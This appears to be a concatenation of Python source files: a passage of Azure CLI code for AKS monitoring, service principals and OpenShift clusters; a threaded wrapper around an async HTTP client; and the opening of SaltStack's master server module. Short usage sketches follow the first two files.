Monitoring addon not supported in cloud : %s", cloud_name) default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code) default_workspace_resource_id = 
'/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \ '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name) resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id) resources = cf_resources(cmd.cli_ctx, subscription_id) # check if default RG exists if resource_groups.check_existence(default_workspace_resource_group): try: resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview') return resource.id except CloudError as ex: if ex.status_code != 404: raise ex else: resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region}) default_workspace_params = { 'location': workspace_region, 'properties': { 'sku': { 'name': 'standalone' } } } async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview', default_workspace_params) ws_resource_id = '' while True: result = async_poller.result(15) if async_poller.done(): ws_resource_id = result.id break return ws_resource_id def _ensure_container_insights_for_monitoring(cmd, addon): # Workaround for this addon key which has been seen lowercased in the wild. if 'loganalyticsworkspaceresourceid' in addon.config: addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid') workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'] workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') # extract subscription ID and resource group from workspace_resource_id URL try: subscription_id = workspace_resource_id.split('/')[2] resource_group = workspace_resource_id.split('/')[4] except IndexError: raise CLIError('Could not locate resource group in workspace-resource-id URL.') # region of workspace can be different from region of RG so find the location of the workspace_resource_id resources = cf_resources(cmd.cli_ctx, subscription_id) try: resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview') location = resource.location except CloudError as ex: raise ex unix_time_in_millis = int( (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0) solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis) # pylint: disable=line-too-long template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "workspaceResourceId": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics Resource ID" } }, "workspaceRegion": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics workspace region" } }, "solutionDeploymentName": { "type": "string", "metadata": { "description": "Name of the solution deployment" } } }, "resources": [ { "type": "Microsoft.Resources/deployments", "name": "[parameters('solutionDeploymentName')]", "apiVersion": "2017-05-10", "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]", "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]", "properties": { "mode": "Incremental", "template": { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": {}, "variables": {}, "resources": [ { "apiVersion": "2015-11-01-preview", "type": 
"Microsoft.OperationsManagement/solutions", "location": "[parameters('workspaceRegion')]", "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "properties": { "workspaceResourceId": "[parameters('workspaceResourceId')]" }, "plan": { "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "product": "[Concat('OMSGallery/', 'ContainerInsights')]", "promotionCode": "", "publisher": "Microsoft" } } ] }, "parameters": {} } } ] } params = { "workspaceResourceId": { "value": workspace_resource_id }, "workspaceRegion": { "value": location }, "solutionDeploymentName": { "value": solution_deployment_name } } deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis) # publish the Container Insights solution to the Log Analytics workspace return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params, validate=False, no_wait=False, subscription_id=subscription_id) def _ensure_aks_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): file_name_aks = 'aksServicePrincipal.json' # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # We don't need to add role assignment for this created SPN else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks) return load_acs_service_principal(subscription_id, file_name=file_name_aks) def _ensure_osa_aad(cli_ctx, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, identifier=None, name=None, create=False, customer_admin_group_id=None): rbac_client = get_graph_rbac_management_client(cli_ctx) if create: # This reply_url is temporary set since Azure need one to create the AAD. 
app_id_name = 'https://{}'.format(name) if not aad_client_app_secret: aad_client_app_secret = _create_client_secret() # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6", additional_properties=None, type="Scope") # Read directory permissions on Windows Azure Active Directory API directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04", additional_properties=None, type="Role") required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access], additional_properties=None, resource_app_id="00000002-0000-0000-c000-000000000000") list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')" .format(app_id_name))) if list_aad_filtered: aad_client_app_id = list_aad_filtered[0].app_id # Updating reply_url with the correct FQDN information returned by the RP reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier) update_application(client=rbac_client.applications, object_id=list_aad_filtered[0].object_id, display_name=name, identifier_uris=[app_id_name], reply_urls=[reply_url], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) logger.info('Updated AAD: %s', aad_client_app_id) else: result = create_application(client=rbac_client.applications, display_name=name, identifier_uris=[app_id_name], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) aad_client_app_id = result.app_id logger.info('Created an AAD: %s', aad_client_app_id) # Get the TenantID if aad_tenant_id is None: profile = Profile(cli_ctx=cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() return OpenShiftManagedClusterAADIdentityProvider( client_id=aad_client_app_id, secret=aad_client_app_secret, tenant_id=aad_tenant_id, kind='AADIdentityProvider', customer_admin_group_id=customer_admin_group_id) def _ensure_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # add role first before save it if not _add_role_assignment(cli_ctx, 'Contributor', service_principal): logger.warning('Could not create a service principal with the right permissions. 
' 'Are you an Owner on this project?') else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal) return load_acs_service_principal(subscription_id) def _create_client_secret(): # Add a special character to satsify AAD SP secret requirements special_chars = '!#$%&*-+_.:;<>=?@][^}{|~)(' special_char = special_chars[ord(os.urandom(1)) % len(special_chars)] client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char return client_secret def _get_rg_location(ctx, resource_group_name, subscription_id=None): groups = cf_resource_groups(ctx, subscription_id=subscription_id) # Just do the get, we don't need the result, it will error out if the group doesn't exist. rg = groups.get(resource_group_name) return rg.location def _print_or_merge_credentials(path, kubeconfig, overwrite_existing): """Merge an unencrypted kubeconfig into the file at the specified path, or print it to stdout if the path is "-". """ # Special case for printing to stdout if path == "-": print(kubeconfig) return # ensure that at least an empty ~/.kube/config exists directory = os.path.dirname(path) if directory and not os.path.exists(directory): try: os.makedirs(directory) except OSError as ex: if ex.errno != errno.EEXIST: raise if not os.path.exists(path): with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'): pass # merge the new kubeconfig into the existing one fd, temp_path = tempfile.mkstemp() additional_file = os.fdopen(fd, 'w+t') try: additional_file.write(kubeconfig) additional_file.flush() merge_kubernetes_configurations(path, temp_path, overwrite_existing) except yaml.YAMLError as ex: logger.warning('Failed to merge credentials to kube config file: %s', ex) finally: additional_file.close() os.remove(temp_path) def _remove_nulls(managed_clusters): """ Remove some often-empty fields from a list of ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags'] ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id'] sp_attrs = ['secret'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) for ap_profile in managed_cluster.agent_pool_profiles: for attr in ap_attrs: if getattr(ap_profile, attr, None) is None: delattr(ap_profile, attr) for attr in sp_attrs: if getattr(managed_cluster.service_principal_profile, attr, None) is None: delattr(managed_cluster.service_principal_profile, attr) return managed_clusters def _remove_osa_nulls(managed_clusters): """ Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. 
""" attrs = ['tags', 'plan', 'type', 'id'] ap_master_attrs = ['name', 'os_type'] net_attrs = ['peer_vnet_id'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) for attr in ap_master_attrs: if getattr(managed_cluster.master_pool_profile, attr, None) is None: delattr(managed_cluster.master_pool_profile, attr) for attr in net_attrs: if getattr(managed_cluster.network_profile, attr, None) is None: delattr(managed_cluster.network_profile, attr) return managed_clusters def _validate_aci_location(norm_location): """ Validate the Azure Container Instance location """ aci_locations = [ "australiaeast", "canadacentral", "centralindia", "centralus", "eastasia", "eastus", "eastus2", "eastus2euap", "japaneast", "northcentralus", "northeurope", "southcentralus", "southeastasia", "southindia", "uksouth", "westcentralus", "westus", "westus2", "westeurope" ] if norm_location not in aci_locations: raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) + ' The available locations are "{}"'.format(','.join(aci_locations))) def osa_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_osa_nulls(list(managed_clusters)) def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals location=None, compute_vm_size="Standard_D4s_v3", compute_count=3, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, vnet_prefix="10.0.0.0/8", subnet_prefix="10.0.0.0/24", vnet_peer=None, tags=None, no_wait=False, customer_admin_group_id=None): if location is None: location = _get_rg_location(cmd.cli_ctx, resource_group_name) agent_pool_profiles = [] agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='compute', # Must be 12 chars or less before ACS RP adds to it count=int(compute_count), vm_size=compute_vm_size, os_type="Linux", role=OpenShiftAgentPoolProfileRole.compute, subnet_cidr=subnet_prefix ) agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='infra', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", role=OpenShiftAgentPoolProfileRole.infra, subnet_cidr=subnet_prefix ) agent_pool_profiles.append(agent_node_pool_profile) agent_pool_profiles.append(agent_infra_pool_profile) agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='master', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", subnet_cidr=subnet_prefix ) identity_providers = [] # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set create_aad = False if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None: create_aad = True # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now try: client.get(resource_group_name, name) except CloudError: create_aad = True osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=aad_client_app_id, aad_client_app_secret=aad_client_app_secret, aad_tenant_id=aad_tenant_id, identifier=None, name=name, create=create_aad, customer_admin_group_id=customer_admin_group_id) identity_providers.append( OpenShiftManagedClusterIdentityProvider( name='Azure AD', provider=osa_aad_identity ) ) auth_profile = 
OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers) default_router_profile = OpenShiftRouterProfile(name='default') if vnet_peer is not None: from azure.cli.core.commands.client_factory import get_subscription_id from msrestazure.tools import is_valid_resource_id, resource_id if not is_valid_resource_id(vnet_peer): vnet_peer = resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Network', type='virtualNetwork', name=vnet_peer ) network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer) osamc = OpenShiftManagedCluster( location=location, tags=tags, open_shift_version="v3.11", network_profile=network_profile, auth_profile=auth_profile, agent_pool_profiles=agent_pool_profiles, master_pool_profile=agent_master_pool_profile, router_profiles=[default_router_profile]) try: # long_running_operation_timeout=300 result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=osamc) result = LongRunningOperation(cmd.cli_ctx)(result) instance = client.get(resource_group_name, name) _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=osa_aad_identity.client_id, aad_client_app_secret=osa_aad_identity.secret, aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname, name=name, create=True) except CloudError as ex: raise ex def openshift_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_osa_nulls([mc])[0] def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False): instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. instance.agent_pool_profiles[0].count = int(compute_count) # pylint: disable=no-member # null out the AAD profile and add manually the masterAP name because otherwise validation complains instance.master_pool_profile.name = "master" instance.auth_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
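# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): a minimal, self-
# contained demonstration of the kubeconfig merge helpers defined above. It
# shows the behavior implemented in merge_kubernetes_configurations: a context
# whose user starts with 'clusterAdmin' is renamed with an '-admin' suffix and
# becomes the current context after the merge. The kubeconfig contents and the
# temp-file helper below are hypothetical stand-ins introduced only for this
# example; the module's own os/yaml imports are assumed to be in scope.
if __name__ == '__main__':
    import tempfile

    def _write_temp_kubeconfig(config):
        # mkstemp creates the file with mode 0600, so the owner-only
        # permission warning in merge_kubernetes_configurations is not hit.
        fd, path = tempfile.mkstemp(suffix='.yaml')
        with os.fdopen(fd, 'w') as stream:
            yaml.safe_dump(config, stream, default_flow_style=False)
        return path

    existing_cfg = {
        'clusters': [{'name': 'old-cluster', 'cluster': {'server': 'https://old:443'}}],
        'users': [{'name': 'user-a', 'user': {}}],
        'contexts': [{'name': 'old-cluster', 'context': {'cluster': 'old-cluster', 'user': 'user-a'}}],
        'current-context': 'old-cluster',
    }
    addition_cfg = {
        'clusters': [{'name': 'demo', 'cluster': {'server': 'https://demo:443'}}],
        'users': [{'name': 'clusterAdmin_rg_demo', 'user': {}}],
        'contexts': [{'name': 'demo', 'context': {'cluster': 'demo', 'user': 'clusterAdmin_rg_demo'}}],
        'current-context': 'demo',
    }

    existing_path = _write_temp_kubeconfig(existing_cfg)
    addition_path = _write_temp_kubeconfig(addition_cfg)
    merge_kubernetes_configurations(existing_path, addition_path, replace=False)
    # Prints 'demo-admin': the admin context was renamed and selected.
    print(load_kubernetes_configuration(existing_path)['current-context'])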
threadclient.py
from __future__ import annotations import asyncio import concurrent.futures as conc import time from queue import Empty, Queue from threading import Lock, Thread from typing import Iterable, List, Optional, SupportsFloat, Union from .client import Client from .request import Request from .response import Response class ThreadFuture(conc.Future): def __init__(self) -> None: super().__init__() self._async_future = None def running(self) -> bool: return bool(self._async_future) def cancel(self) -> bool: while not self.running(): time.sleep(0.1) return self._async_future.cancel() def cancelled(self) -> bool: if not self.running(): return False return self._async_future.cancelled() def done(self) -> bool: if not self.running(): return False return self._async_future.done() def result(self, timeout: SupportsFloat = None) -> Union[Response, List[Response]]: start = time.time() while self._async_future is None or not self._async_future.done(): time.sleep(0.1) if timeout is not None and time.time() - start > timeout: raise conc.TimeoutError return self._async_future.result() class ThreadClient: def __init__(self, setting: Optional[dict] = None) -> None: self._queue = Queue() self._stop = ThreadFuture() self._lock = Lock() self._thread = Thread(target=self._thread_run, args=(setting,)) self._thread.start() self._repr = '<ThreadClient - Pending: 0 (0 batch) Processing: 0/0>' def _thread_run(self, setting) -> None: asyncio.run(self._async_run(setting)) def __repr__(self) -> str: return self._repr def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() async def _async_run(self, setting: Optional[dict]) -> None: async with Client(setting) as async_client: while True: _repr = repr(async_client) self._repr = '<Thread' + _repr[1:] try: # We must not use Queue.get(), which will otherwise # block the whole thread. future, requests = self._queue.get_nowait() except Empty: await asyncio.sleep(0.1) else: if future is self._stop: self._queue.task_done() break with self._lock: future._async_future = async_client.submit(requests) self._queue.task_done() def submit(self, requests: Union[Request, Iterable[Request]]) -> conc.Future: future = ThreadFuture() self._queue.put((future, requests)) return future def close(self) -> None: self._queue.put((self._stop, None)) self._thread.join()
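# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): how ThreadClient is
# intended to be driven from ordinary synchronous code. submit() hands a
# request batch to the background asyncio loop and immediately returns a
# ThreadFuture; result() blocks only the calling thread while the event loop
# keeps working, and the context manager guarantees close() runs so the worker
# thread is joined. The Request constructor arguments are hypothetical --
# adjust them to the real signature in request.py -- and, because of the
# relative imports, this would be run with the package on the import path.
if __name__ == '__main__':
    with ThreadClient() as client:
        # Queue two batches; each call returns right away.
        first = client.submit(Request('https://example.com'))        # hypothetical ctor args
        second = client.submit([Request('https://example.com/a'),    # hypothetical ctor args
                                Request('https://example.com/b')])
        # Block until the background loop has finished each batch.
        print(first.result(timeout=30))
        print(second.result(timeout=30))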
master.py
# -*- coding: utf-8 -*- ''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python libs import os import re import time import errno import signal import shutil import stat import logging import hashlib try: import pwd except ImportError: # This is in case windows minion is importing pass import resource import subprocess import multiprocessing import sys # Import third party libs import zmq import yaml from M2Crypto import RSA # Import salt libs import salt.crypt import salt.utils import salt.client import salt.exitcodes import salt.payload import salt.pillar import salt.state import salt.runner import salt.auth import salt.wheel import salt.minion import salt.search import salt.key import salt.fileserver import salt.daemons.masterapi import salt.utils.atomicfile import salt.utils.event import salt.utils.verify import salt.utils.minions import salt.utils.gzip_util from salt.utils.debug import enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack from salt.exceptions import MasterExit from salt.utils.event import tagify # Import halite libs try: import halite HAS_HALITE = True except ImportError: HAS_HALITE = False try: import systemd.daemon HAS_PYTHON_SYSTEMD = True except ImportError: HAS_PYTHON_SYSTEMD = False log = logging.getLogger(__name__) def clean_proc(proc, wait_for_kill=10): ''' Generic method for cleaning up multiprocessing procs ''' # NoneType and other fun stuff need not apply if not proc: return try: waited = 0 while proc.is_alive(): proc.terminate() waited += 1 time.sleep(0.1) if proc.is_alive() and (waited >= wait_for_kill): log.error( 'Process did not die with terminate(): {0}'.format( proc.pid ) ) os.kill(signal.SIGKILL, proc.pid) except (AssertionError, AttributeError): # Catch AssertionError when the proc is evaluated inside the child # Catch AttributeError when the process dies between proc.is_alive() # and proc.terminate() and turns into a NoneType pass class SMaster(object): ''' Create a simple salt-master, this will generate the top level master ''' def __init__(self, opts): ''' Create a salt master server instance ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() self.crypticle = self.__prep_crypticle() def __prep_crypticle(self): ''' Return the crypticle used for AES ''' return salt.crypt.Crypticle(self.opts, self.opts['aes']) def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. ''' return salt.daemons.masterapi.access_keys(self.opts) class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance ''' # Warn if ZMQ < 3.2 if not(hasattr(zmq, 'zmq_version_info')) or \ zmq.zmq_version_info() < (3, 2): # PyZMQ 2.1.9 does not have zmq_version_info log.warning('You have a version of ZMQ less than ZMQ 3.2! There ' 'are known connection keep-alive issues with ZMQ < ' '3.2 which may result in loss of contact with ' 'minions. Please upgrade your ZMQ!') SMaster.__init__(self, opts) def _clear_old_jobs(self): ''' The clean old jobs function is the general passive maintenance process controller for the Salt master. This is where any data that needs to be cleanly maintained from the master is maintained. 
''' # Set up search object search = salt.search.Search(self.opts) # Make Start Times last = int(time.time()) rotate = int(time.time()) # Init fileserver manager fileserver = salt.fileserver.Fileserver(self.opts) # Load Runners runners = salt.loader.runner(self.opts) # Init Scheduler schedule = salt.utils.schedule.Schedule(self.opts, runners) ckminions = salt.utils.minions.CkMinions(self.opts) # Make Event bus for firing event = salt.utils.event.MasterEvent(self.opts['sock_dir']) # Init any values needed by the git ext pillar pillargitfs = salt.daemons.masterapi.init_git_pillar(self.opts) # Clean out the fileserver backend cache salt.daemons.masterapi.clean_fsbackend(self.opts) old_present = set() while True: now = int(time.time()) loop_interval = int(self.opts['loop_interval']) if (now - last) >= loop_interval: salt.daemons.masterapi.clean_old_jobs(self.opts) if self.opts.get('publish_session'): if now - rotate >= self.opts['publish_session']: salt.crypt.dropfile( self.opts['cachedir'], self.opts['user']) rotate = now if self.opts.get('search'): if now - last >= self.opts['search_index_interval']: search.index() salt.daemons.masterapi.fileserver_update(fileserver) # check how close to FD limits you are salt.utils.verify.check_max_open_files(self.opts) try: for pillargit in pillargitfs: pillargit.update() except Exception as exc: log.error('Exception {0} occurred in file server update ' 'for git_pillar module.'.format(exc)) try: schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if schedule.loop_interval < loop_interval: loop_interval = schedule.loop_interval except Exception as exc: log.error( 'Exception {0} occurred in scheduled job'.format(exc) ) last = now if self.opts.get('presence_events', False): present = ckminions.connected_ids() new = present.difference(old_present) lost = old_present.difference(present) if new or lost: # Fire new minions present event data = {'new': list(new), 'lost': list(lost)} event.fire_event(data, tagify('change', 'presence')) data = {'present': list(present)} event.fire_event(data, tagify('present', 'presence')) old_present = present try: time.sleep(loop_interval) except KeyboardInterrupt: break def __set_max_open_files(self): # Let's check to see how our max open files(ulimit -n) setting is mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) if mof_h == resource.RLIM_INFINITY: # Unclear what to do with infinity... OSX reports RLIM_INFINITY as # hard limit,but raising to anything above soft limit fails... mof_h = mof_s log.info( 'Current values for max open files soft/hard setting: ' '{0}/{1}'.format( mof_s, mof_h ) ) # Let's grab, from the configuration file, the value to raise max open # files to mof_c = self.opts['max_open_files'] if mof_c > mof_h: # The configured value is higher than what's allowed log.info( 'The value for the \'max_open_files\' setting, {0}, is higher ' 'than what the user running salt is allowed to raise to, {1}. ' 'Defaulting to {1}.'.format(mof_c, mof_h) ) mof_c = mof_h if mof_s < mof_c: # There's room to raise the value. Raise it! log.info('Raising max open files value to {0}'.format(mof_c)) resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h)) try: mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) log.info( 'New values for max open files soft/hard values: ' '{0}/{1}'.format(mof_s, mof_h) ) except ValueError: # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595 # A user under OSX reported that our 100000 default value is # still too high. 
log.critical( 'Failed to raise max open files setting to {0}. If this ' 'value is too low. The salt-master will most likely fail ' 'to run properly.'.format( mof_c ) ) def _pre_flight(self): ''' Run pre flight checks, if anything in this method fails then the master should not start up ''' errors = [] fileserver = salt.fileserver.Fileserver(self.opts) if not fileserver.servers: errors.append( 'Failed to load fileserver backends, the configured backends ' 'are: {0}'.format(', '.join(self.opts['fileserver_backend'])) ) if not self.opts['fileserver_backend']: errors.append('No fileserver backends are configured') if errors: for error in errors: log.error(error) log.error('Master failed pre flight checks, exiting\n') sys.exit(salt.exitcodes.EX_GENERIC) def start(self): ''' Turn on the master server components ''' self._pre_flight() log.info( 'salt-master is starting as user {0!r}'.format(salt.utils.get_user()) ) enable_sigusr1_handler() enable_sigusr2_handler() self.__set_max_open_files() clear_old_jobs_proc = multiprocessing.Process( target=self._clear_old_jobs) clear_old_jobs_proc.start() reqserv = ReqServer( self.opts, self.crypticle, self.key, self.master_key) reqserv.start_publisher() reqserv.start_event_publisher() reqserv.start_reactor() reqserv.start_halite() def sigterm_clean(signum, frame): ''' Cleaner method for stopping multiprocessing processes when a SIGTERM is encountered. This is required when running a salt master under a process minder like daemontools ''' log.warn( 'Caught signal {0}, stopping the Salt Master'.format( signum ) ) clean_proc(clear_old_jobs_proc) clean_proc(reqserv.publisher) clean_proc(reqserv.eventpublisher) if hasattr(reqserv, 'halite'): clean_proc(reqserv.halite) if hasattr(reqserv, 'reactor'): clean_proc(reqserv.reactor) for proc in reqserv.work_procs: clean_proc(proc) raise MasterExit signal.signal(signal.SIGTERM, sigterm_clean) try: reqserv.run() except KeyboardInterrupt: # Shut the master down gracefully on SIGINT log.warn('Stopping the Salt Master') raise SystemExit('\nExiting on Ctrl-c') class Halite(multiprocessing.Process): ''' Manage the Halite server ''' def __init__(self, hopts): super(Halite, self).__init__() self.hopts = hopts def run(self): ''' Fire up halite! ''' halite.start(self.hopts) class Publisher(multiprocessing.Process): ''' The publishing interface, a simple zeromq publisher that sends out the commands. 
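
    The run loop binds a PUB socket on tcp://{interface}:{publish_port} for
    the minions and a PULL socket on the publish_pull.ipc file under
    sock_dir; every payload pushed onto the IPC socket (which is what
    ClearFuncs.publish does) is re-sent unchanged on the PUB socket.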
''' def __init__(self, opts): super(Publisher, self).__init__() self.opts = opts def run(self): ''' Bind to the interface specified in the configuration file ''' # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000)) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) salt.utils.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info('Starting the Salt Publisher on {0}'.format(pub_uri)) pub_sock.bind(pub_uri) # Securely create socket log.info('Starting the Salt Puller on {0}'.format(pull_uri)) old_umask = os.umask(0177) try: pull_sock.bind(pull_uri) finally: os.umask(old_umask) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: package = pull_sock.recv() pub_sock.send(package) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: if pub_sock.closed is False: pub_sock.setsockopt(zmq.LINGER, 1) pub_sock.close() if pull_sock.closed is False: pull_sock.setsockopt(zmq.LINGER, 1) pull_sock.close() if context.closed is False: context.term() class ReqServer(object): ''' Starts up the master request server, minions send results to this interface. 
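
    A ROUTER socket is bound on tcp://{interface}:{ret_port} for minion
    connections and a DEALER socket on the workers.ipc file under sock_dir.
    __bind starts worker_threads MWorker processes and then runs a zmq QUEUE
    device between the two sockets, so incoming requests are distributed
    across the worker processes.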
